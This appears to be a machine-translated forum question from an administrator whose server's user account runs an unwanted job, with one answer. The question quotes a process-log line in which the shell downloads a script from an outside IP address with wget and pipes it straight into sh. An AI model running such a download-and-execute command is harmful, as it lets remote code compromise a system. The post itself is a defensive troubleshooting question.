我将如何解决这个问题?我已经尝试过以下如何在 Linux 中禁用特定用户的特定命令摘自《极客日记》
User:clipdrop PID:8426 PPID:8401 Run Time:0(secs) Memory:113280(kb) RSS:1180(kb) exe:/usr/bin/bash cmd:/bin/sh -c wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1
编辑#1
运行getfacl /usr/bin/wget我得到:
getfacl: Removing leading '/' from absolute path names
# file: usr/bin/wget
# owner: root
# group: root
user::rwx
user:clipdrop:---
group::r-x
mask::r-x
other::r-x
答案1
在 Unix/Linux 上,获取替代工具来执行任何邪恶行为(下载随机文件、使用curl、任何 FTP 客户端、使用 Web 浏览器,甚至使用 emacs 中的 Web 浏览器;获取源代码)太容易了来自控制版本系统并自行编译;使用例如Python、Perl,它们具有内置的或作为或多或少标准库的一部分的大多数“典型”网络任务。